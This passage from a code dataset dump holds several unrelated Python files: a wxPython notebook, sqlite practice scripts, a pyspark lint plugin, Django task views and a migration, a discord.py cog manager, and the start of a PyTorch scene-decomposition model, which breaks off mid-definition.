ctBoxSizer.Add(self.ctCtrl,1,wx.EXPAND)\n\n self.SetSizer(topSizer)\n\nclass MLTextPage(wx.Panel):\n def __init__(self,parent,winId):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n narrativeBox = wx.StaticBox(self,-1)\n narrativeBoxSizer = wx.StaticBoxSizer(narrativeBox,wx.HORIZONTAL)\n topSizer.Add(narrativeBoxSizer,1,wx.EXPAND)\n self.narrativeCtrl = wx.TextCtrl(self,winId,'',style=wx.TE_MULTILINE)\n narrativeBoxSizer.Add(self.narrativeCtrl,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\nclass ConcernAssociationPage(wx.Panel):\n def __init__(self,parent,winId,dp):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n caBox = wx.StaticBox(self,-1)\n caBoxSizer = wx.StaticBoxSizer(caBox,wx.HORIZONTAL)\n topSizer.Add(caBoxSizer,1,wx.EXPAND)\n self.caList = ConcernAssociationListCtrl(self,winId,dp)\n caBoxSizer.Add(self.caList,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\nclass ConcernPage(wx.Panel):\n def __init__(self,parent,winId,dp):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n sgBox = wx.StaticBox(self,-1)\n sgBoxSizer = wx.StaticBoxSizer(sgBox,wx.HORIZONTAL)\n topSizer.Add(sgBoxSizer,1,wx.EXPAND)\n self.concernList = 
DimensionListCtrl(self,winId,wx.DefaultSize,'Concern','asset',dp)\n sgBoxSizer.Add(self.concernList,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\n\nclass GoalEnvironmentNotebook(wx.Notebook):\n def __init__(self,parent,dp,refiningGoal=False):\n wx.Notebook.__init__(self,parent,armid.GOAL_NOTEBOOKENVIRONMENT_ID)\n p1 = SummaryPage(self,refiningGoal)\n p2 = MLTextPage(self,armid.GOAL_TEXTFITCRITERION_ID)\n p3 = MLTextPage(self,armid.GOAL_TEXTISSUE_ID)\n p4 = GoalPage(self,armid.GOAL_LISTGOALREFINEMENTS_ID,True,dp)\n p5 = GoalPage(self,armid.GOAL_LISTSUBGOALREFINEMENTS_ID,False,dp)\n p6 = ConcernPage(self,armid.GOAL_LISTCONCERNS_ID,dp)\n p7 = ConcernAssociationPage(self,armid.GOAL_LISTCONCERNASSOCIATIONS_ID,dp)\n self.AddPage(p1,'Definition')\n self.AddPage(p2,'Fit Criterion')\n self.AddPage(p3,'Issue')\n self.AddPage(p4,'Goals')\n self.AddPage(p5,'Sub-Goals')\n self.AddPage(p6,'Concerns')\n self.AddPage(p7,'Concern Associations')\n","sub_path":"cairis/cairis/GoalEnvironmentNotebook.py","file_name":"GoalEnvironmentNotebook.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350779000","text":"'''\n\n新進測試\n\n'''\n\nprint('------------------------------------------------------------')\t#60個\nprint('準備工作')\n\nimport sqlite3\n\ndef show_data_base_contents(db_filename, table_name, length):\n conn = sqlite3.connect(db_filename) # 建立資料庫連線\n sqlstr = 'SELECT * FROM {};'.format(table_name)#same\n sqlstr = 'SELECT * FROM %s' % table_name\n cursor = conn.execute(sqlstr)\n\n n = 0\n for row in cursor:\n print(row)\n n = n + 1\n #讀取 N 筆資料, 即跳出\n if n == length:\n break\n conn.close() # 關閉資料庫連線\n\ndef show_data_base_contents_all(db_filename, table_name):\n conn = sqlite3.connect(db_filename) # 建立資料庫連線\n sqlstr = 'SELECT * FROM {};'.format(table_name)#same\n sqlstr = 'SELECT * FROM %s' % table_name\n results = str(conn.execute(sqlstr).fetchall())\n print(results)\n conn.close() # 關閉資料庫連線\n\nprint('------------------------------------------------------------')\t#60個\n\nprint('新進測試')\n\n\ndb_filename = 'ims_sql/db_ims.sqlite'\ndb_filename = 'C:/_git/vcs/_1.data/______test_files1/_db/gasoline.sqlite'\n#db_filename = 'db_20230703_113217.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\n\nprint('要事先能知道表單的名稱 prices 與 各欄位的名稱 gdate')\n\ncursor = conn.execute('SELECT * FROM prices ORDER BY gdate DESC;')\n\nn = 0\nfor row in cursor:\n print(row)\n print(\"日期:{},92無鉛:{},95無鉛:{},98無鉛:{}\". 
format(row[0], row[1], row[2], row[3]))\n n = n + 1\n #讀取10筆資料, 即跳出\n if n == 5:\n break\n\nconn.close() # 關閉資料庫連線\n\nprint('-------------------')\ntable_name = 'prices'\nlength = 5\nshow_data_base_contents(db_filename, table_name, length)\nprint('-------------------')\nshow_data_base_contents_all(db_filename, table_name)\n\n#----------------------------------------------------------------\n\n\n'''\n\n新進測試\n測試 SERIAL 測不出效果\n\n測試 TIMESTAMP\n測試 DATE\n測試 CHECK\n\n測試部分填入資料\n\n'''\n\nprint('------------------------------------------------------------')\t#60個\nprint('新進測試')\n\nimport sqlite3\nimport datetime\n\ndb_filename = 'sssss4.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\ncursor = conn.cursor() # 建立 cursor 物件\n\nsqlstr = '''\nCREATE TABLE IF NOT EXISTS table01 (\n --id SERIAL PRIMARY KEY, 無效\n id_num INTEGER,\n name VARCHAR(50),\n birthday DATE CHECK(birthday > '1900-01-01'),\n work_time DATE CHECK(work_time > birthday),\n money INTEGER CHECK(money > 0), -- 預設錯誤時會顯示\n update_time TIMESTAMP\n);\n'''\n\ncursor.execute(sqlstr)\nconn.commit() # 更新\n\nid_num = 3\nname = 'David'\nbirthday = '2006-03-11'\nwork_time = '2023-07-11'\nmoney = 2345\nupdate_time = datetime.datetime.now()\n\nsql = \"INSERT INTO table01 (id_num, name, birthday, work_time, money, update_time) VALUES ({}, '{}', '{}', '{}', {}, '{}')\"\n#print(sql)\nsqlstr = sql.format(id_num, name, birthday, work_time, money, update_time)\n\n#或者直接寫\n#sqlstr = \"INSERT INTO table01 (id_num, name, birthday, work_time, money) VALUES (5, 'David', 'xxxx', 'xxxx', 1234, 'xxxx');\"\n\ncursor.execute(sqlstr)\n\nprint('資料不足時, 部分填入資料')\nid_num = 5\nname = 'Eric'\nupdate_time = datetime.datetime.now()\n\nsql = \"INSERT INTO table01 (id_num, name, update_time) VALUES ({}, '{}', '{}')\"\n#print(sql)\nsqlstr = sql.format(id_num, name, update_time)\ncursor.execute(sqlstr)\n\nconn.commit() # 更新\nconn.close() # 關閉資料庫連線\n\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\n\ncursor = conn.execute('SELECT * FROM table01')\n\nn = 0\nfor row in cursor:\n print(row)\n n = n + 1\n #讀取10筆資料, 即跳出\n\nconn.close() # 關閉資料庫連線\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('一次寫入多行的語法 executescript')\n\nimport sqlite3\nimport datetime\n\ndb_filename = 'sssss4_many1.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\ncursor = conn.cursor() # 建立 cursor 物件\nconn.execute(\"CREATE virtual TABLE table01 using fts3(name, ingredients)\")\nconn.executescript(\"\"\"\n INSERT INTO table01 (name, ingredients) VALUES ('broccoli stew', 'broccoli peppers cheese tomatoes');\n INSERT INTO table01 (name, ingredients) VALUES ('pumpkin stew', 'pumpkin onions garlic celery');\n INSERT INTO table01 (name, ingredients) VALUES ('broccoli pie', 'broccoli cheese onions flour');\n INSERT INTO table01 (name, ingredients) VALUES ('pumpkin pie', 'pumpkin sugar flour butter');\n \"\"\")\n\nfor row in conn.execute(\"SELECT rowid, name, ingredients FROM table01 WHERE name MATCH 'pie'\"):\n print(row)\n\n#conn.commit() # 更新\n\ntable_name = 'table01'\nshow_data_base_contents_all(db_filename, table_name)\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('一次寫入多行的語法 executescript')\n\nimport sqlite3\n\ncon = sqlite3.connect(\":memory:\")\ncur = con.cursor()\ncur.executescript(\"\"\"\n CREATE TABLE person(\n firstname,\n lastname,\n age\n );\n\n CREATE TABLE book(\n title,\n author,\n published\n );\n\n INSERT INTO book(title, author, 
published)\n VALUES (\n 'Dirk Gently''s Holistic Detective Agency',\n 'Douglas Adams',\n 1987\n );\n \"\"\")\n\nprint('------------------------------------------------------------')\t#60個\nprint('xxxxx')\n\nimport sqlite3\n\ncon = sqlite3.connect(\":memory:\")\ncur = con.cursor()\ncur.execute(\"CREATE TABLE people (name_last, age)\")\n\nwho = 'David'\nage = 18\n\ncur.execute(\"INSERT INTO people VALUES (?, ?)\", (who, age))\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('xxxxx')\n\n\n\nprint(\"程式執行完畢!\")\n\n","sub_path":"_4.python/sqlite/sqlite_新進測試1.py","file_name":"sqlite_新進測試1.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"401308673","text":"import re\n\n\nMETA_FIELDS = ('AUTHOR','VERSION','DESC','REPO','URL')\n\nclass Module():\n \n def __init__(self,position,uid,tags={}):\n\n if not isinstance(tags,dict):\n raise TypeError\n \n self.position = position \n self.uid = uid\n [setattr(self,field,tags.pop(field)) for field in META_FIELDS if (field in tags)]\n self.tags = tags\n\n @staticmethod\n def create_from_string(position,s):\n match_obj = re.findall(\"\"\"(?P^\\w+):(?P.+$)\"\"\",s,re.MULTILINE)\n attr = { i[0]:i[1] for i in match_obj}\n print(attr)\n module = Module(position,attr.pop('ID'),tags=attr)\n return module\n\n\n","sub_path":"src/core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"371377115","text":"# Copyright 2017 Palantir Technologies, Inc.\nimport ast\nimport logging\nfrom pyls import hookimpl, lsp\n\nlog = logging.getLogger(__name__)\n\n@hookimpl\ndef pyls_settings():\n # Default pydocstyle to disabled\n return {'plugins': {'pyspark': {'enabled': False}}}\n\n@hookimpl\ndef pyls_lint(config, document):\n config.plugin_settings('pyspark')\n log.debug(\"Running pyspark lint.\")\n\n try:\n tree = ast.parse(document.source, document.path)\n except SyntaxError:\n return None\n\n ast.fix_missing_locations(tree)\n diags = []\n spark_methods_require_shuffle = [\n 'repartition',\n 'coalesce',\n 'cogroup',\n 'sortByKey',\n 'aggregateByKey',\n 'reduceByKey',\n 'groupByKey',\n 'join',\n ]\n for node in ast.walk(tree):\n if isinstance(node, ast.Attribute):\n if hasattr(node, 'attr') and node.attr in spark_methods_require_shuffle:\n diags.append({\n 'source': 'pyspark',\n 'range': {\n 'start': {'line': node.lineno - 1, 'character': node.col_offset},\n 'end': {'line': node.lineno - 1, 'character': node.col_offset + 14},\n },\n 'message': 'Repartition is expensive.',\n 'severity': lsp.DiagnosticSeverity.Warning\n })\n\n return diags\n","sub_path":"pyls/plugins/pyspark_lint.py","file_name":"pyspark_lint.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"628948489","text":"n = int(input())\nlimit = list(map(int, input().split()))\nm = int(input())\nweight = list(map(int, input().split()))\n\nlimit.sort(reverse=True)\nweight.sort(reverse=True)\n\nif weight[0] > limit[0]:\n print(-1)\nelse:\n ans = 0\n while weight:\n ans += 1\n for x in limit:\n if not weight:\n break\n\n for y in weight:\n if x >= y:\n weight.remove(y)\n break\n 
print(ans)","sub_path":"problem_solving/2021/210608/210608_4.py","file_name":"210608_4.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"121015975","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('rtiapp', '0009_auto_20180622_1550'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='alumno',\n            name='pais',\n            field=models.CharField(max_length=3, default='ESP', choices=[('ESP', 'España'), ('GTM', 'Guatemala'), ('ECU', 'Ecuador'), ('CAN', 'Canarias')]),\n        ),\n        migrations.AlterField(\n            model_name='evaluador',\n            name='pais',\n            field=models.CharField(max_length=3, default='ESP', choices=[('ESP', 'España'), ('GTM', 'Guatemala'), ('ECU', 'Ecuador'), ('CAN', 'Canarias')]),\n        ),\n    ]\n","sub_path":"rtiapp/migrations/0010_auto_20180622_1607.py","file_name":"0010_auto_20180622_1607.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"283488843","text":"import json\n\nfin = open('laba24/in.json','r')\nfout = open('laba24/out.json','w')\n\ntasks = json.loads(fin.read())\n\nusers = {}\nfor task in tasks:\n    if task['userId'] not in users:\n        users[task['userId']] = 0\n    if task['completed']:\n        users[task['userId']] += 1\n\noutput = []\nfor user in users:\n    output.append({'userId':user, 'task_completed':users[user]})\n\njson.dump(output, fout, indent=2)","sub_path":"laba24/laba24.py","file_name":"laba24.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"607774395","text":"from django.shortcuts import redirect, render\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import CurrentForm\nfrom django.contrib import messages\n\nimport datetime\nimport xlwt\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\n\n\ndef about(request):\n    \n    return render(request, 'task/dashboard/about.html')\n# Create your views here.\n\n@login_required\ndef index(request):\n    comp_tasks_count = Current.objects.filter(status='Completed').count()\n    del_tasks_count = Current.objects.filter(status='Deleted').count()\n    curr_tasks_count = Current.objects.filter(status='Current').count()\n    context = {\n        'comp_tasks_count': comp_tasks_count,\n        'del_tasks_count': del_tasks_count,\n        'curr_tasks_count': curr_tasks_count,\n    }\n    return render(request, 'task/dashboard/index.html', context)\n\n\n@login_required\ndef current(request):\n    curr_tasks = Current.objects.filter(status='Current')\n    curr_tasks_count = curr_tasks.count()\n\n    del_tasks_count = Current.objects.filter(status='Deleted').count()\n    comp_tasks_count = Current.objects.filter(status='Completed').count()\n    \n    if request.method == \"POST\":\n        form = CurrentForm(request.POST)\n        if form.is_valid():\n            form.save()\n            task_name = form.cleaned_data.get('task')\n            messages.success(request, f'{task_name} has been added')\n        \n        return redirect('dashboard-current')\n    else:\n        form = CurrentForm()\n\n    context = {\n        'comp_tasks_count': comp_tasks_count,\n        'del_tasks_count': del_tasks_count,\n        'curr_tasks': curr_tasks,\n        'curr_tasks_count': curr_tasks_count,\n        'form': form,\n    }\n    return render(request, 'task/dashboard/current.html', context)\n\n\n@login_required\n# Current update and 
delete\ndef current_delete(request, pk):\n curr_del = Current.objects.get(id=pk)\n if request.method == \"POST\":\n curr_del.delete()\n return redirect('dashboard-current')\n\n return render(request, 'task/dashboard/current_delete.html')\n\n@login_required\ndef current_update(request, pk):\n curr_up = Current.objects.get(id=pk)\n if request.method == \"POST\":\n form = CurrentForm(request.POST, instance=curr_up)\n if form.is_valid():\n form.save()\n return redirect('dashboard-current')\n else:\n form = CurrentForm(instance=curr_up)\n context = {\n 'form': form,\n }\n return render(request, 'task/dashboard/current_update.html', context)\n\n@login_required\n# Completed update and delete\ndef completed_delete(request, pk):\n comp_del = Current.objects.get(id=pk)\n if request.method == \"POST\":\n comp_del.delete()\n return redirect('dashboard-current')\n\n return render(request, 'task/dashboard/completed_delete.html')\n\n@login_required\ndef completed_update(request, pk):\n comp_up = Current.objects.get(id=pk)\n if request.method == \"POST\":\n form = CurrentForm(request.POST, instance=comp_up)\n if form.is_valid():\n form.save()\n return redirect('dashboard-current')\n else:\n form = CurrentForm(instance=comp_up)\n context = {\n 'form': form,\n }\n return render(request, 'task/dashboard/completed_update.html', context)\n\n@login_required\ndef completed(request):\n comp_tasks = Current.objects.filter(status='Completed')\n comp_tasks_count = comp_tasks.count()\n\n del_tasks_count = Current.objects.filter(status='Deleted').count()\n curr_tasks_count = Current.objects.filter(status='Current').count()\n\n\n \n context = {\n 'comp_tasks': comp_tasks,\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks_count': curr_tasks_count,\n }\n return render(request, 'task/dashboard/completed.html', context)\n\n\n@login_required\ndef deleted(request):\n del_tasks = Current.objects.filter(status='Deleted')\n del_tasks_count = del_tasks.count()\n comp_tasks_count = Current.objects.filter(status='Completed').count()\n curr_tasks_count = Current.objects.filter(status='Current').count()\n\n context = {\n 'del_tasks': del_tasks,\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks_count': curr_tasks_count,\n }\n \n return render(request, 'task/dashboard/deleted.html', context)\n\n@login_required\ndef export_excel(request, id):\n if id == 1: # current\n obj = Current\n obj_name = 'Current'\n elif id == 2: # completed\n obj = Completed\n obj_name = 'Completed'\n elif id == 3: # Deleted\n obj = Deleted\n obj_name = 'Deleted'\n else:\n print('no id')\n\n \n response=HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = f'attachment; filename={obj_name}.xls' \n \n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(f'{obj_name} Tasks')\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['task', 'user', 'date', 'status']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style) # at 0 row 0 column \n\n curr_tasks = Current.objects.filter(status=f'{obj_name}').values_list('task', 'user', 'date', 'status')\n \n for row in curr_tasks:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n \n wb.save(response)\n return response\n 
","sub_path":"task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249149071","text":"from django.db.models import fields\n\ndef get_changes_between_models(model1, model2, fields=[]):\n\tchanges = {}\n\tfor field in fields:\n\t\tif model1.__getattribute__(field) != model2.__getattribute__(field):\n\t\t\tchanges[field] = (model1._meta.get_field(field).value_from_object(model1), \n\t\t\t\t\t\t\t\tmodel2._meta.get_field(field).value_from_object(model2),)\n\treturn changes\n\ndef get_stats():\n\tfrom models import Issue\n\tfrom django.contrib.auth.models import User\n\tstats = {}\n\tstats['total_issues'] = Issue.objects.all().count()\n\tstats['open_issues'] = Issue.objects.open().count()\n\tstats['closed_issues'] = Issue.objects.closed().count()\n\tstats['total_users'] = User.objects.all().count()\n\treturn stats\n","sub_path":"coral/tracker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"390691533","text":"from utils import min_image_dims_in_dir, shuffle_split_files\n\nmain_run = 'dims' # 'split'\n\n###################################\n# min_image_dims_in_dir #\n###################################\n\nif main_run == 'dims':\n # directory = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5/train/images/'\n directory = '/Users/bothmena/Projects/AIForMobility/datasets/yolo_labels/yolo_v3_to_v5/sample/input_images'\n width, height = min_image_dims_in_dir(directory, ['jpg'])\n\n print('min width = {} / min height = {}'.format(width, height))\n\n###################################\n# min_image_dims_in_dir #\n###################################\n\nif main_run == 'split':\n original_dir = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5/train'\n destination = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5_train_valid'\n\n shuffle_split_files([.8, .2], original_dir, destination)\n","sub_path":"utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"269095935","text":"from discord.ext import commands\n\n\nclass CogManager(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.last_reloaded = None\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def load(self, ctx, *, module):\n \"\"\"Loads a module.\"\"\"\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.load_extension(module)\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} loaded successfully', delete_after=5.0)\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def unload(self, ctx, *, module):\n \"\"\"Unloads a module.\"\"\"\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.unload_extension(module)\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} unloaded successfully', 
delete_after=5.0)\n\n @commands.group(name='reload', invoke_without_command=True)\n @commands.has_permissions(administrator=True)\n async def _reload(self, ctx, *, module=None):\n \"\"\"Reloads a module.\"\"\"\n\n if module is None:\n if self.last_reloaded is not None:\n await self._reload(ctx, module=self.last_reloaded)\n return\n\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.reload_extension(module)\n self.last_reloaded = module\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} reloaded successfully', delete_after=5.0)\n\n @_reload.command(name='all', hidden=True)\n @commands.has_permissions(administrator=True)\n async def _reload_all(self, ctx):\n \"\"\"Reloads all modules\"\"\"\n output = \"\"\n\n for module in list(self.bot.extensions.keys()):\n try:\n self.bot.reload_extension(module)\n except commands.ExtensionError as err:\n output += f'{module} - {err.__class__.__name__}: {err}\\n'\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n output += f'{module} - reloaded successfully\\n'\n\n await ctx.message.delete(delay=5.0)\n await ctx.send_embed(output, delete_after=5.0)\n\n @commands.command()\n async def cogs(self, ctx):\n await ctx.send_embed(\" **»** \" + \"\\n **»** \".join(self.bot.cogs))\n\n @commands.command(aliases=[\"extentions\"])\n async def extensions(self, ctx):\n await ctx.send_embed(\" **»** \" + \"\\n **»** \".join(self.bot.extensions))\n\n\ndef setup(bot):\n bot.add_cog(CogManager(bot))\n","sub_path":"bot/cogs/cog_manager.py","file_name":"cog_manager.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613531643","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional\nfrom network import InitializerBack, InitializerFull, InitializerCrop, UpdaterBack, UpdaterFull, UpdaterCrop, \\\n EncDecBack, EncDecFull, EncDecCrop\nimport pdb\n\nclass Model(nn.Module):\n\n def __init__(self, args):\n super(Model, self).__init__()\n # Hyperparameters\n self.register_buffer('prior_where_mu', torch.tensor(args.prior_where_mu)[None, None])\n self.register_buffer('prior_where_invvar', 1 / torch.tensor(args.prior_where_std)[None, None].pow(2))\n self.register_buffer('prior_where_logvar', -self.prior_where_invvar.log())\n self.num_steps = args.num_steps\n self.max_objects = args.max_objects\n self.image_full_height = args.image_full_height\n self.image_full_width = args.image_full_width\n self.image_crop_height = args.image_crop_height\n self.image_crop_width = args.image_crop_width\n self.gaussian_invvar = 1 / pow(args.gaussian_std, 2)\n self.gaussian_const = math.log(2 * math.pi / self.gaussian_invvar)\n self.prior_pres_alpha = args.prior_pres_alpha\n self.prior_pres_log_alpha = math.log(self.prior_pres_alpha)\n # Neural networks\n self.init_back = InitializerBack(args)\n self.init_full = InitializerFull(args)\n self.init_crop = InitializerCrop(args)\n self.upd_back = UpdaterBack(args)\n self.upd_full = UpdaterFull(args)\n self.upd_crop = UpdaterCrop(args)\n self.enc_dec_back = EncDecBack(args)\n self.enc_dec_full = EncDecFull(args)\n self.enc_dec_crop = EncDecCrop(args)\n\n def compute_grid(self, scl, trs, batch_size):\n theta_crop = torch.stack([\n 
torch.stack([scl[:, 0], torch.zeros_like(scl[:, 0]), trs[:, 0]], dim=1),\n torch.stack([torch.zeros_like(scl[:, 1]), scl[:, 1], trs[:, 1]], dim=1),\n ], dim=1)\n theta_full = torch.stack([\n torch.stack([1 / scl[:, 0], torch.zeros_like(scl[:, 0]), -trs[:, 0] / scl[:, 0]], dim=1),\n torch.stack([torch.zeros_like(scl[:, 1]), 1 / scl[:, 1], -trs[:, 1] / scl[:, 1]], dim=1),\n ], dim=1)\n grid_crop = nn.functional.affine_grid(\n theta_crop, [batch_size, 1, self.image_crop_height, self.image_crop_width])\n grid_full = nn.functional.affine_grid(\n theta_full, [batch_size, 1, self.image_full_height, self.image_full_width])\n return grid_crop, grid_full\n\n @staticmethod\n def compute_gamma(shp, zeta):\n x = shp * zeta[..., None, None]\n padded_ones = x.new_ones(1, *x.shape[1:])\n return torch.cat([x, padded_ones]) * torch.cat([padded_ones, 1 - x]).cumprod(0)\n\n def compute_init_full_inputs(self, images, result_back, result_obj):\n gamma = self.compute_gamma(result_obj['shp'], result_obj['zeta'])\n recon = (gamma * torch.cat([result_obj['apc'], result_back['back'][None]])).sum(0)\n mask = 1 - gamma[-1]\n return torch.cat([images, recon, mask], dim=1).detach()\n\n def compute_upd_back_inputs(self, images, result_back, result_obj):\n inputs_exclude = self.compute_init_full_inputs(images, result_back, result_obj)\n return torch.cat([inputs_exclude, result_back['back']], dim=1).detach()\n\n def compute_upd_full_inputs(self, images, result_back, result_obj, idx):\n gamma_above = self.compute_gamma(result_obj['shp'][:idx], result_obj['zeta'][:idx])\n gamma_below = self.compute_gamma(result_obj['shp'][idx + 1:], result_obj['zeta'][idx + 1:])\n gamma_cur = self.compute_gamma(result_obj['shp'][idx:idx + 1], result_obj['zeta'][idx:idx + 1])\n recon_above = (gamma_above * torch.cat([result_obj['apc'][:idx], result_back['back'][None]])).sum(0)\n recon_below = (gamma_below * torch.cat([result_obj['apc'][idx + 1:], result_back['back'][None]])).sum(0)\n mask_above = 1 - gamma_above[-1]\n recon_cur = (gamma_cur * torch.cat([result_obj['apc'][idx:idx + 1], result_back['back'][None]])).sum(0)\n mask_cur = 1 - gamma_cur[-1]\n return torch.cat([images, recon_above, recon_below, mask_above, recon_cur, mask_cur], dim=1).detach()\n\n def compute_upd_crop_inputs(self, images, result_back, result_obj, grid_crop, idx):\n inputs_full = self.compute_upd_full_inputs(images, result_back, result_obj, idx)\n return nn.functional.grid_sample(inputs_full, grid_crop)\n\n @staticmethod\n def initialize_storage(result_obj, states_dict, update_dict):\n for key, val in result_obj.items():\n if val is None:\n result_obj[key] = update_dict[key][None]\n else:\n result_obj[key] = torch.cat([val, update_dict[key][None]])\n for key in states_dict:\n states_dict[key].append(update_dict[key])\n return\n\n @staticmethod\n def update_storage(result_obj, states_dict, update_dict, idx):\n for key, val in result_obj.items():\n if states_dict is not None or key in update_dict:\n result_obj[key] = torch.cat([val[:idx], update_dict[key][None], val[idx + 1:]])\n if states_dict is not None:\n for key, val in states_dict.items():\n states_dict[key] = val[:idx] + [update_dict[key]] + val[idx + 1:]\n return\n\n def compute_indices(self, images, result_obj, eps=1e-5):\n diffs_sq = (result_obj['apc'] - images[None]).pow(2).sum(-3, keepdim=True).detach()\n masks = result_obj['shp'].clone().detach()\n coefs = masks.new_ones(masks.shape[:-2])\n indices_list = []\n for _ in range(diffs_sq.shape[0]):\n vis_diffs_sq = (masks * diffs_sq).view(*masks.shape[:-2], 
-1).sum(-1)\n vis_areas = masks.view(*masks.shape[:-2], -1).sum(-1)\n vis_max_vals = masks.view(*masks.shape[:-2], -1).max(-1).values\n scores = coefs * vis_max_vals * result_obj['zeta'] * \\\n torch.exp(-0.5 * self.gaussian_invvar * vis_diffs_sq / (vis_areas + eps))\n indices = torch.argmax(scores, dim=0)\n indices_list.append(indices)\n mask = torch.gather(masks, 0, indices[None, ..., None, None].expand(-1, -1, *masks.shape[2:]))\n masks *= 1 - mask\n coefs.scatter_(0, indices[None], -1)\n indices = torch.stack(indices_list)\n return indices\n\n @staticmethod\n def adjust_order_sub(x, indices):\n if x.dim() == 3:\n x = torch.gather(x, 0, indices.expand(-1, -1, *x.shape[2:]))\n elif x.dim() == 5:\n x = torch.gather(x, 0, indices[..., None, None].expand(-1, -1, *x.shape[2:]))\n else:\n raise AssertionError\n return x\n\n def adjust_order(self, images, result_obj, states_dict):\n indices = self.compute_indices(images, result_obj)\n for key, val in result_obj.items():\n result_obj[key] = self.adjust_order_sub(val, indices)\n for key, val in states_dict.items():\n states_0 = self.adjust_order_sub(torch.stack([n[0] for n in val]), indices)\n states_1 = self.adjust_order_sub(torch.stack([n[1] for n in val]), indices)\n states_dict[key] = [(n_0, n_1) for n_0, n_1 in zip(states_0, states_1)]\n return\n\n @staticmethod\n def transform_result(result):\n for key, val in result.items():\n if key not in ['back', 'back_likelihood', 'back_latent']:\n result[key] = val.transpose(0, 1)\n return result\n\n def forward(self, images):\n ###################\n # Initializations #\n ###################\n # Background\n states_back = self.init_back(images)\n result_back = self.enc_dec_back(states_back[0])\n # Objects\n result_obj = {\n 'apc': images.new_empty(0, *images.shape), #转换后物体的外观\n 'shp': images.new_zeros(0, images.shape[0], 1, *images.shape[2:]), #转换后物体的形状\n 'zeta': images.new_zeros(0, images.shape[0], 1),\n # 